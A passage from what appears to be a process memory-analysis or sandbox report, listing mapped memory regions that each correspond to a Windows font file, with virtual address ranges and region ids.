region_type = mapped_file
name = "msjh.ttc"
filename = "\\Windows\\Fonts\\MSJH.TTC" (normalized: "c:\\windows\\fonts\\msjh.ttc")
Region:
id = 1198
start_va = 0x4ff0000
end_va = 0x5d9dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msjhbd.ttc"
filename = "\\Windows\\Fonts\\MSJHBD.TTC" (normalized: "c:\\windows\\fonts\\msjhbd.ttc")
Region:
id = 1199
start_va = 0x4ff0000
end_va = 0x5d9dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msjhbd.ttc"
filename = "\\Windows\\Fonts\\MSJHBD.TTC" (normalized: "c:\\windows\\fonts\\msjhbd.ttc")
Region:
id = 1200
start_va = 0x4ff0000
end_va = 0x5d9dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msjhbd.ttc"
filename = "\\Windows\\Fonts\\MSJHBD.TTC" (normalized: "c:\\windows\\fonts\\msjhbd.ttc")
Region:
id = 1201
start_va = 0x8b0000
end_va = 0x8e8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msuighub.ttf"
filename = "\\Windows\\Fonts\\MSUIGHUB.TTF" (normalized: "c:\\windows\\fonts\\msuighub.ttf")
Region:
id = 1202
start_va = 0x8b0000
end_va = 0x8e8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msuighub.ttf"
filename = "\\Windows\\Fonts\\MSUIGHUB.TTF" (normalized: "c:\\windows\\fonts\\msuighub.ttf")
Region:
id = 1203
start_va = 0x7d50000
end_va = 0x91dbfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msyh.ttc"
filename = "\\Windows\\Fonts\\MSYH.TTC" (normalized: "c:\\windows\\fonts\\msyh.ttc")
Region:
id = 1204
start_va = 0x7d50000
end_va = 0x91dbfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msyh.ttc"
filename = "\\Windows\\Fonts\\MSYH.TTC" (normalized: "c:\\windows\\fonts\\msyh.ttc")
Region:
id = 1205
start_va = 0x7d50000
end_va = 0x91dbfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msyh.ttc"
filename = "\\Windows\\Fonts\\MSYH.TTC" (normalized: "c:\\windows\\fonts\\msyh.ttc")
Region:
id = 1206
start_va = 0x4ff0000
end_va = 0x5da7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msyhbd.ttc"
filename = "\\Windows\\Fonts\\MSYHBD.TTC" (normalized: "c:\\windows\\fonts\\msyhbd.ttc")
Region:
id = 1207
start_va = 0x4ff0000
end_va = 0x5da7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msyhbd.ttc"
filename = "\\Windows\\Fonts\\MSYHBD.TTC" (normalized: "c:\\windows\\fonts\\msyhbd.ttc")
Region:
id = 1208
start_va = 0x4ff0000
end_va = 0x5da7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msyhbd.ttc"
filename = "\\Windows\\Fonts\\MSYHBD.TTC" (normalized: "c:\\windows\\fonts\\msyhbd.ttc")
Region:
id = 1209
start_va = 0x8b0000
end_va = 0x8d6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mtcorsva.ttf"
filename = "\\Windows\\Fonts\\MTCORSVA.TTF" (normalized: "c:\\windows\\fonts\\mtcorsva.ttf")
Region:
id = 1210
start_va = 0x8b0000
end_va = 0x8d6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mtcorsva.ttf"
filename = "\\Windows\\Fonts\\MTCORSVA.TTF" (normalized: "c:\\windows\\fonts\\mtcorsva.ttf")
Region:
id = 1211
start_va = 0x8b0000
end_va = 0x8c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "niageng.ttf"
filename = "\\Windows\\Fonts\\NIAGENG.TTF" (normalized: "c:\\windows\\fonts\\niageng.ttf")
Region:
id = 1212
start_va = 0x8b0000
end_va = 0x8c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "niageng.ttf"
filename = "\\Windows\\Fonts\\NIAGENG.TTF" (normalized: "c:\\windows\\fonts\\niageng.ttf")
Region:
id = 1213
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "niagsol.ttf"
filename = "\\Windows\\Fonts\\NIAGSOL.TTF" (normalized: "c:\\windows\\fonts\\niagsol.ttf")
Region:
id = 1214
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "niagsol.ttf"
filename = "\\Windows\\Fonts\\NIAGSOL.TTF" (normalized: "c:\\windows\\fonts\\niagsol.ttf")
Region:
id = 1215
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ocraext.ttf"
filename = "\\Windows\\Fonts\\OCRAEXT.TTF" (normalized: "c:\\windows\\fonts\\ocraext.ttf")
Region:
id = 1216
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ocraext.ttf"
filename = "\\Windows\\Fonts\\OCRAEXT.TTF" (normalized: "c:\\windows\\fonts\\ocraext.ttf")
Region:
id = 1217
start_va = 0x8b0000
end_va = 0x8c6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "oldengl.ttf"
filename = "\\Windows\\Fonts\\OLDENGL.TTF" (normalized: "c:\\windows\\fonts\\oldengl.ttf")
Region:
id = 1218
start_va = 0x8b0000
end_va = 0x8c6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "oldengl.ttf"
filename = "\\Windows\\Fonts\\OLDENGL.TTF" (normalized: "c:\\windows\\fonts\\oldengl.ttf")
Region:
id = 1219
start_va = 0x8b0000
end_va = 0x8c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "onyx.ttf"
filename = "\\Windows\\Fonts\\ONYX.TTF" (normalized: "c:\\windows\\fonts\\onyx.ttf")
Region:
id = 1220
start_va = 0x8b0000
end_va = 0x8c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "onyx.ttf"
filename = "\\Windows\\Fonts\\ONYX.TTF" (normalized: "c:\\windows\\fonts\\onyx.ttf")
Region:
id = 1221
start_va = 0x610000
end_va = 0x614fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "outlook.ttf"
filename = "\\Windows\\Fonts\\OUTLOOK.TTF" (normalized: "c:\\windows\\fonts\\outlook.ttf")
Region:
id = 1222
start_va = 0x610000
end_va = 0x614fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "outlook.ttf"
filename = "\\Windows\\Fonts\\OUTLOOK.TTF" (normalized: "c:\\windows\\fonts\\outlook.ttf")
Region:
id = 1223
start_va = 0x610000
end_va = 0x61cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "palscri.ttf"
filename = "\\Windows\\Fonts\\PALSCRI.TTF" (normalized: "c:\\windows\\fonts\\palscri.ttf")
Region:
id = 1224
start_va = 0x610000
end_va = 0x61cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "palscri.ttf"
filename = "\\Windows\\Fonts\\PALSCRI.TTF" (normalized: "c:\\windows\\fonts\\palscri.ttf")
Region:
id = 1225
start_va = 0x8b0000
end_va = 0x8d7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "papyrus.ttf"
filename = "\\Windows\\Fonts\\PAPYRUS.TTF" (normalized: "c:\\windows\\fonts\\papyrus.ttf")
Region:
id = 1226
start_va = 0x8b0000
end_va = 0x8d7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "papyrus.ttf"
filename = "\\Windows\\Fonts\\PAPYRUS.TTF" (normalized: "c:\\windows\\fonts\\papyrus.ttf")
Region:
id = 1227
start_va = 0x8b0000
end_va = 0x8d4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "parchm.ttf"
filename = "\\Windows\\Fonts\\PARCHM.TTF" (normalized: "c:\\windows\\fonts\\parchm.ttf")
Region:
id = 1228
start_va = 0x8b0000
end_va = 0x8d4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "parchm.ttf"
filename = "\\Windows\\Fonts\\PARCHM.TTF" (normalized: "c:\\windows\\fonts\\parchm.ttf")
Region:
id = 1229
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "per_____.ttf"
filename = "\\Windows\\Fonts\\PER_____.TTF" (normalized: "c:\\windows\\fonts\\per_____.ttf")
Region:
id = 1230
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "per_____.ttf"
filename = "\\Windows\\Fonts\\PER_____.TTF" (normalized: "c:\\windows\\fonts\\per_____.ttf")
Region:
id = 1231
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "perb____.ttf"
filename = "\\Windows\\Fonts\\PERB____.TTF" (normalized: "c:\\windows\\fonts\\perb____.ttf")
Region:
id = 1232
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "perb____.ttf"
filename = "\\Windows\\Fonts\\PERB____.TTF" (normalized: "c:\\windows\\fonts\\perb____.ttf")
Region:
id = 1233
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "perbi___.ttf"
filename = "\\Windows\\Fonts\\PERBI___.TTF" (normalized: "c:\\windows\\fonts\\perbi___.ttf")
Region:
id = 1234
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "perbi___.ttf"
filename = "\\Windows\\Fonts\\PERBI___.TTF" (normalized: "c:\\windows\\fonts\\perbi___.ttf")
Region:
id = 1235
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "peri____.ttf"
filename = "\\Windows\\Fonts\\PERI____.TTF" (normalized: "c:\\windows\\fonts\\peri____.ttf")
Region:
id = 1236
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "peri____.ttf"
filename = "\\Windows\\Fonts\\PERI____.TTF" (normalized: "c:\\windows\\fonts\\peri____.ttf")
Region:
id = 1237
start_va = 0x610000
end_va = 0x61bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "pertibd.ttf"
filename = "\\Windows\\Fonts\\PERTIBD.TTF" (normalized: "c:\\windows\\fonts\\pertibd.ttf")
Region:
id = 1238
start_va = 0x610000
end_va = 0x61bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "pertibd.ttf"
filename = "\\Windows\\Fonts\\PERTIBD.TTF" (normalized: "c:\\windows\\fonts\\pertibd.ttf")
Region:
id = 1239
start_va = 0x610000
end_va = 0x61afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "pertili.ttf"
filename = "\\Windows\\Fonts\\PERTILI.TTF" (normalized: "c:\\windows\\fonts\\pertili.ttf")
Region:
id = 1240
start_va = 0x610000
end_va = 0x61afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "pertili.ttf"
filename = "\\Windows\\Fonts\\PERTILI.TTF" (normalized: "c:\\windows\\fonts\\pertili.ttf")
Region:
id = 1241
start_va = 0x610000
end_va = 0x61bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "playbill.ttf"
filename = "\\Windows\\Fonts\\PLAYBILL.TTF" (normalized: "c:\\windows\\fonts\\playbill.ttf")
Region:
id = 1242
start_va = 0x610000
end_va = 0x61bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "playbill.ttf"
filename = "\\Windows\\Fonts\\PLAYBILL.TTF" (normalized: "c:\\windows\\fonts\\playbill.ttf")
Region:
id = 1243
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "poorich.ttf"
filename = "\\Windows\\Fonts\\POORICH.TTF" (normalized: "c:\\windows\\fonts\\poorich.ttf")
Region:
id = 1244
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "poorich.ttf"
filename = "\\Windows\\Fonts\\POORICH.TTF" (normalized: "c:\\windows\\fonts\\poorich.ttf")
Region:
id = 1245
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "pristina.ttf"
filename = "\\Windows\\Fonts\\PRISTINA.TTF" (normalized: "c:\\windows\\fonts\\pristina.ttf")
Region:
id = 1246
start_va = 0x8b0000
end_va = 0x8c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "pristina.ttf"
filename = "\\Windows\\Fonts\\PRISTINA.TTF" (normalized: "c:\\windows\\fonts\\pristina.ttf")
Region:
id = 1247
start_va = 0x8b0000
end_va = 0x8d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rage.ttf"
filename = "\\Windows\\Fonts\\RAGE.TTF" (normalized: "c:\\windows\\fonts\\rage.ttf")
Region:
id = 1248
start_va = 0x8b0000
end_va = 0x8d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rage.ttf"
filename = "\\Windows\\Fonts\\RAGE.TTF" (normalized: "c:\\windows\\fonts\\rage.ttf")
Region:
id = 1249
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ravie.ttf"
filename = "\\Windows\\Fonts\\RAVIE.TTF" (normalized: "c:\\windows\\fonts\\ravie.ttf")
Region:
id = 1250
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ravie.ttf"
filename = "\\Windows\\Fonts\\RAVIE.TTF" (normalized: "c:\\windows\\fonts\\ravie.ttf")
Region:
id = 1251
start_va = 0x8b0000
end_va = 0x8e5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "refsan.ttf"
filename = "\\Windows\\Fonts\\REFSAN.TTF" (normalized: "c:\\windows\\fonts\\refsan.ttf")
Region:
id = 1252
start_va = 0x8b0000
end_va = 0x8e5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "refsan.ttf"
filename = "\\Windows\\Fonts\\REFSAN.TTF" (normalized: "c:\\windows\\fonts\\refsan.ttf")
Region:
id = 1253
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "refspcl.ttf"
filename = "\\Windows\\Fonts\\REFSPCL.TTF" (normalized: "c:\\windows\\fonts\\refspcl.ttf")
Region:
id = 1254
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "refspcl.ttf"
filename = "\\Windows\\Fonts\\REFSPCL.TTF" (normalized: "c:\\windows\\fonts\\refspcl.ttf")
Region:
id = 1255
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rocc____.ttf"
filename = "\\Windows\\Fonts\\ROCC____.TTF" (normalized: "c:\\windows\\fonts\\rocc____.ttf")
Region:
id = 1256
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rocc____.ttf"
filename = "\\Windows\\Fonts\\ROCC____.TTF" (normalized: "c:\\windows\\fonts\\rocc____.ttf")
Region:
id = 1257
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "roccb___.ttf"
filename = "\\Windows\\Fonts\\ROCCB___.TTF" (normalized: "c:\\windows\\fonts\\roccb___.ttf")
Region:
id = 1258
start_va = 0x610000
end_va = 0x61efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "roccb___.ttf"
filename = "\\Windows\\Fonts\\ROCCB___.TTF" (normalized: "c:\\windows\\fonts\\roccb___.ttf")
Region:
id = 1259
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rock.ttf"
filename = "\\Windows\\Fonts\\ROCK.TTF" (normalized: "c:\\windows\\fonts\\rock.ttf")
Region:
id = 1260
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rock.ttf"
filename = "\\Windows\\Fonts\\ROCK.TTF" (normalized: "c:\\windows\\fonts\\rock.ttf")
Region:
id = 1261
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rockb.ttf"
filename = "\\Windows\\Fonts\\ROCKB.TTF" (normalized: "c:\\windows\\fonts\\rockb.ttf")
Region:
id = 1262
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rockb.ttf"
filename = "\\Windows\\Fonts\\ROCKB.TTF" (normalized: "c:\\windows\\fonts\\rockb.ttf")
Region:
id = 1263
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rockbi.ttf"
filename = "\\Windows\\Fonts\\ROCKBI.TTF" (normalized: "c:\\windows\\fonts\\rockbi.ttf")
Region:
id = 1264
start_va = 0x8b0000
end_va = 0x8c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rockbi.ttf"
filename = "\\Windows\\Fonts\\ROCKBI.TTF" (normalized: "c:\\windows\\fonts\\rockbi.ttf")
Region:
id = 1265
start_va = 0x610000
end_va = 0x61cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rockeb.ttf"
filename = "\\Windows\\Fonts\\ROCKEB.TTF" (normalized: "c:\\windows\\fonts\\rockeb.ttf")
Region:
id = 1266
start_va = 0x610000
end_va = 0x61cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rockeb.ttf"
filename = "\\Windows\\Fonts\\ROCKEB.TTF" (normalized: "c:\\windows\\fonts\\rockeb.ttf")
Region:
id = 1267
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rocki.ttf"
filename = "\\Windows\\Fonts\\ROCKI.TTF" (normalized: "c:\\windows\\fonts\\rocki.ttf")
Region:
id = 1268
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rocki.ttf"
filename = "\\Windows\\Fonts\\ROCKI.TTF" (normalized: "c:\\windows\\fonts\\rocki.ttf")
Region:
id = 1269
start_va = 0x8b0000
end_va = 0x8d9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schlbkb.ttf"
filename = "\\Windows\\Fonts\\SCHLBKB.TTF" (normalized: "c:\\windows\\fonts\\schlbkb.ttf")
Region:
id = 1270
start_va = 0x8b0000
end_va = 0x8d9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schlbkb.ttf"
filename = "\\Windows\\Fonts\\SCHLBKB.TTF" (normalized: "c:\\windows\\fonts\\schlbkb.ttf")
Region:
id = 1271
start_va = 0x8b0000
end_va = 0x8d7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schlbkbi.ttf"
filename = "\\Windows\\Fonts\\SCHLBKBI.TTF" (normalized: "c:\\windows\\fonts\\schlbkbi.ttf")
Region:
id = 1272
start_va = 0x8b0000
end_va = 0x8d7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schlbkbi.ttf"
filename = "\\Windows\\Fonts\\SCHLBKBI.TTF" (normalized: "c:\\windows\\fonts\\schlbkbi.ttf")
Region:
id = 1273
start_va = 0x8b0000
end_va = 0x8d7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schlbki.ttf"
filename = "\\Windows\\Fonts\\SCHLBKI.TTF" (normalized: "c:\\windows\\fonts\\schlbki.ttf")
Region:
id = 1274
start_va = 0x8b0000
end_va = 0x8d7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schlbki.ttf"
filename = "\\Windows\\Fonts\\SCHLBKI.TTF" (normalized: "c:\\windows\\fonts\\schlbki.ttf")
Region:
id = 1275
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "scriptbl.ttf"
filename = "\\Windows\\Fonts\\SCRIPTBL.TTF" (normalized: "c:\\windows\\fonts\\scriptbl.ttf")
Region:
id = 1276
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "scriptbl.ttf"
filename = "\\Windows\\Fonts\\SCRIPTBL.TTF" (normalized: "c:\\windows\\fonts\\scriptbl.ttf")
Region:
id = 1277
start_va = 0x12b0000
end_va = 0x1347fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeuisl.ttf"
filename = "\\Windows\\Fonts\\SEGOEUISL.TTF" (normalized: "c:\\windows\\fonts\\segoeuisl.ttf")
Region:
id = 1278
start_va = 0x12b0000
end_va = 0x1347fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeuisl.ttf"
filename = "\\Windows\\Fonts\\SEGOEUISL.TTF" (normalized: "c:\\windows\\fonts\\segoeuisl.ttf")
Region:
id = 1279
start_va = 0x610000
end_va = 0x61cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "showg.ttf"
filename = "\\Windows\\Fonts\\SHOWG.TTF" (normalized: "c:\\windows\\fonts\\showg.ttf")
Region:
id = 1280
start_va = 0x610000
end_va = 0x61cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "showg.ttf"
filename = "\\Windows\\Fonts\\SHOWG.TTF" (normalized: "c:\\windows\\fonts\\showg.ttf")
Region:
id = 1281
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "snap____.ttf"
filename = "\\Windows\\Fonts\\SNAP____.TTF" (normalized: "c:\\windows\\fonts\\snap____.ttf")
Region:
id = 1282
start_va = 0x610000
end_va = 0x61ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "snap____.ttf"
filename = "\\Windows\\Fonts\\SNAP____.TTF" (normalized: "c:\\windows\\fonts\\snap____.ttf")
Region:
id = 1283
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stencil.ttf"
filename = "\\Windows\\Fonts\\STENCIL.TTF" (normalized: "c:\\windows\\fonts\\stencil.ttf")
Region:
id = 1284
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stencil.ttf"
filename = "\\Windows\\Fonts\\STENCIL.TTF" (normalized: "c:\\windows\\fonts\\stencil.ttf")
Region:
id = 1285
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tcb_____.ttf"
filename = "\\Windows\\Fonts\\TCB_____.TTF" (normalized: "c:\\windows\\fonts\\tcb_____.ttf")
Region:
id = 1286
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tcb_____.ttf"
filename = "\\Windows\\Fonts\\TCB_____.TTF" (normalized: "c:\\windows\\fonts\\tcb_____.ttf")
Region:
id = 1287
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tcbi____.ttf"
filename = "\\Windows\\Fonts\\TCBI____.TTF" (normalized: "c:\\windows\\fonts\\tcbi____.ttf")
Region:
id = 1288
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tcbi____.ttf"
filename = "\\Windows\\Fonts\\TCBI____.TTF" (normalized: "c:\\windows\\fonts\\tcbi____.ttf")
Region:
id = 1289
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tccb____.ttf"
filename = "\\Windows\\Fonts\\TCCB____.TTF" (normalized: "c:\\windows\\fonts\\tccb____.ttf")
Region:
id = 1290
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tccb____.ttf"
filename = "\\Windows\\Fonts\\TCCB____.TTF" (normalized: "c:\\windows\\fonts\\tccb____.ttf")
Region:
id = 1291
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tcceb.ttf"
filename = "\\Windows\\Fonts\\TCCEB.TTF" (normalized: "c:\\windows\\fonts\\tcceb.ttf")
Region:
id = 1292
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tcceb.ttf"
filename = "\\Windows\\Fonts\\TCCEB.TTF" (normalized: "c:\\windows\\fonts\\tcceb.ttf")
Region:
id = 1293
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tccm____.ttf"
filename = "\\Windows\\Fonts\\TCCM____.TTF" (normalized: "c:\\windows\\fonts\\tccm____.ttf")
Region:
id = 1294
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tccm____.ttf"
filename = "\\Windows\\Fonts\\TCCM____.TTF" (normalized: "c:\\windows\\fonts\\tccm____.ttf")
Region:
id = 1295
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tcm_____.ttf"
filename = "\\Windows\\Fonts\\TCM_____.TTF" (normalized: "c:\\windows\\fonts\\tcm_____.ttf")
Region:
id = 1296
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tcm_____.ttf"
filename = "\\Windows\\Fonts\\TCM_____.TTF" (normalized: "c:\\windows\\fonts\\tcm_____.ttf")
Region:
id = 1297
start_va = 0x8b0000
end_va = 0x8c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tcmi____.ttf"
filename = "\\Windows\\Fonts\\TCMI____.TTF" (normalized: "c:\\windows\\fonts\\tcmi____.ttf")
Region:
id = 1298
start_va = 0x8b0000
end_va = 0x8c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tcmi____.ttf"
filename = "\\Windows\\Fonts\\TCMI____.TTF" (normalized: "c:\\windows\\fonts\\tcmi____.ttf")
Region:
id = 1299
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tempsitc.ttf"
filename = "\\Windows\\Fonts\\TEMPSITC.TTF" (normalized: "c:\\windows\\fonts\\tempsitc.ttf")
Region:
id = 1300
start_va = 0x8b0000
end_va = 0x8c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tempsitc.ttf"
filename = "\\Windows\\Fonts\\TEMPSITC.TTF" (normalized: "c:\\windows\\fonts\\tempsitc.ttf")
Region:
id = 1301
start_va = 0x8b0000
end_va = 0x8c9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vineritc.ttf"
filename = "\\Windows\\Fonts\\VINERITC.TTF" (normalized: "c:\\windows\\fonts\\vineritc.ttf")
Region:
id = 1302
start_va = 0x8b0000
end_va = 0x8c9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vineritc.ttf"
filename = "\\Windows\\Fonts\\VINERITC.TTF" (normalized: "c:\\windows\\fonts\\vineritc.ttf")
Region:
id = 1303
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vivaldii.ttf"
filename = "\\Windows\\Fonts\\VIVALDII.TTF" (normalized: "c:\\windows\\fonts\\vivaldii.ttf")
Region:
id = 1304
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vivaldii.ttf"
filename = "\\Windows\\Fonts\\VIVALDII.TTF" (normalized: "c:\\windows\\fonts\\vivaldii.ttf")
Region:
id = 1305
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vladimir.ttf"
filename = "\\Windows\\Fonts\\VLADIMIR.TTF" (normalized: "c:\\windows\\fonts\\vladimir.ttf")
Region:
id = 1306
start_va = 0x610000
end_va = 0x61dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vladimir.ttf"
filename = "\\Windows\\Fonts\\VLADIMIR.TTF" (normalized: "c:\\windows\\fonts\\vladimir.ttf")
Region:
id = 1307
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wingdng2.ttf"
filename = "\\Windows\\Fonts\\WINGDNG2.TTF" (normalized: "c:\\windows\\fonts\\wingdng2.ttf")
Region:
id = 1308
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wingdng2.ttf"
filename = "\\Windows\\Fonts\\WINGDNG2.TTF" (normalized: "c:\\windows\\fonts\\wingdng2.ttf")
Region:
id = 1309
start_va = 0x610000
end_va = 0x618fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wingdng3.ttf"
filename = "\\Windows\\Fonts\\WINGDNG3.TTF" (normalized: "c:\\windows\\fonts\\wingdng3.ttf")
Region:
id = 1310
start_va = 0x610000
end_va = 0x618fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wingdng3.ttf"
filename = "\\Windows\\Fonts\\WINGDNG3.TTF" (normalized: "c:\\windows\\fonts\\wingdng3.ttf")
Region:
id = 1311
start_va = 0x610000
end_va = 0x611fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mtextra.ttf"
filename = "\\Program Files (x86)\\Common Files\\microsoft shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\equation\\mtextra.ttf")
Region:
id = 1312
